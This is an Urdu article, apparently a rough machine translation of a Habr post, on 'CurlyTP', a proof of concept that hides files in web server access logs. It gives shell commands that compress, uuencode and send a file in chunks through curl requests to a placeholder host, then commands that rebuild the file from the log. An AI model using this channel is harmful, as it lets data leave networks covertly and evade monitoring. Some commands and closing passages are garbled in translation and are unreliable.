ویکیپیڈیا کی تعریف کے مطابق، ڈیڈ ڈراپ ایک سازشی ٹول ہے جو خفیہ مقام استعمال کرنے والے لوگوں کے درمیان معلومات یا کچھ اشیاء کا تبادلہ کرتا ہے۔ خیال یہ ہے کہ لوگ کبھی نہیں ملتے ہیں - لیکن وہ پھر بھی آپریشنل حفاظت کو برقرار رکھنے کے لیے معلومات کا تبادلہ کرتے ہیں۔
چھپنے کی جگہ توجہ مبذول نہیں ہونی چاہئے۔ اس لیے، آف لائن دنیا میں وہ اکثر عقلمند چیزیں استعمال کرتے ہیں: دیوار میں ڈھیلی اینٹ، لائبریری کی کتاب، یا درخت میں کھوکھلا۔
انٹرنیٹ پر بہت سے خفیہ کاری اور گمنامی کے ٹولز موجود ہیں، لیکن ان ٹولز کے استعمال کی حقیقت توجہ مبذول کراتی ہے۔ اس کے علاوہ، انہیں کارپوریٹ یا حکومتی سطح پر بلاک کیا جا سکتا ہے۔ کیا کرنا ہے؟
ڈویلپر ریان فلاورز نے ایک دلچسپ آپشن تجویز کیا۔
یہ پتہ چلتا ہے کہ کوئی بھی ویب سرور آپ کو لاگ میں تقریبا کسی بھی پیغام کو محفوظ کرنے کی اجازت دیتا ہے۔ پھول حیران تھے کہ اسے کیسے استعمال کیا جائے۔
وہ یہ اختیار پیش کرتا ہے:
- ایک ٹیکسٹ فائل (خفیہ پیغام) لیں اور ہیش (md5sum) کا حساب لگائیں۔
- ہم اسے انکوڈ کرتے ہیں (gzip+uencode)۔
- ہم سرور کو جان بوجھ کر غلط درخواست کا استعمال کرتے ہوئے لاگ پر لکھتے ہیں۔
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh
کسی فائل کو پڑھنے کے لیے، آپ کو ان کارروائیوں کو الٹ ترتیب میں انجام دینے کی ضرورت ہے: فائل کو ڈی کوڈ اور ان زپ کریں، ہیش کو چیک کریں (ہیش کو کھلے چینلز پر محفوظ طریقے سے منتقل کیا جا سکتا ہے)۔
خالی جگہوں سے تبدیل کیا جاتا ہے۔ =+=
تاکہ ایڈریس میں کوئی خالی جگہ نہ رہے۔ پروگرام، جسے مصنف CurlyTP کہتے ہیں، بیس 64 انکوڈنگ کا استعمال کرتا ہے، جیسے ای میل منسلکات۔ درخواست ایک مطلوبہ لفظ کے ساتھ کی گئی ہے۔ ?transfer?
تاکہ وصول کنندہ اسے نوشتہ جات میں آسانی سے تلاش کر سکے۔
ہم اس معاملے میں نوشتہ جات میں کیا دیکھتے ہیں؟
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
جیسا کہ پہلے ہی ذکر کیا جا چکا ہے، خفیہ پیغام موصول کرنے کے لیے آپ کو الٹ ترتیب میں آپریشن کرنے کی ضرورت ہے:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g
عمل خود کار طریقے سے آسان ہے. Md5sum مماثل ہے، اور فائل کے مندرجات اس بات کی تصدیق کرتے ہیں کہ ہر چیز کو صحیح طریقے سے ڈی کوڈ کیا گیا تھا۔
طریقہ بہت آسان ہے۔ "اس مشق کا مقصد صرف یہ ثابت کرنا ہے کہ فائلوں کو معصوم چھوٹی ویب درخواستوں کے ذریعے منتقل کیا جا سکتا ہے، اور یہ سادہ ٹیکسٹ لاگ کے ساتھ کسی بھی ویب سرور پر کام کرتا ہے۔ بنیادی طور پر، ہر ویب سرور ایک چھپنے کی جگہ ہے!" پھول لکھتے ہیں۔
بلاشبہ، طریقہ صرف اس صورت میں کام کرتا ہے جب وصول کنندہ کو سرور لاگز تک رسائی حاصل ہو۔ لیکن اس طرح کی رسائی فراہم کی جاتی ہے، مثال کے طور پر، بہت سے میزبانوں کی طرف سے.
اسے کیسے استعمال کریں؟
ریان فلاورز کا کہنا ہے کہ وہ انفارمیشن سیکیورٹی کے ماہر نہیں ہیں اور CurlyTP کے ممکنہ استعمال کی فہرست مرتب نہیں کریں گے۔ اس کے لیے، یہ تصور کا صرف ایک ثبوت ہے کہ جو مانوس ٹولز ہم ہر روز دیکھتے ہیں وہ غیر روایتی طریقے سے استعمال کیے جا سکتے ہیں۔
درحقیقت، اس طریقہ کار کے دوسرے سرور پر بہت سے فوائد ہیں جیسے "چھپاتے ہیں"
یہ سروس فائلوں کے ذریعے پیغامات کی ترسیل کا ایک طریقہ ہے۔ آپ کو یاد ہے کہ کچھ جدید کمپنیاں کیسے جگہ دیتی تھیں۔
خیال یہ تھا کہ صرف ویب ڈویلپر ہی اس ایسٹر ایگ کو دیکھیں گے، کیونکہ ایک عام آدمی ہیڈر یا ایچ ٹی ایم ایل کوڈ کو نہیں دیکھے گا۔
ماخذ: www.habr.com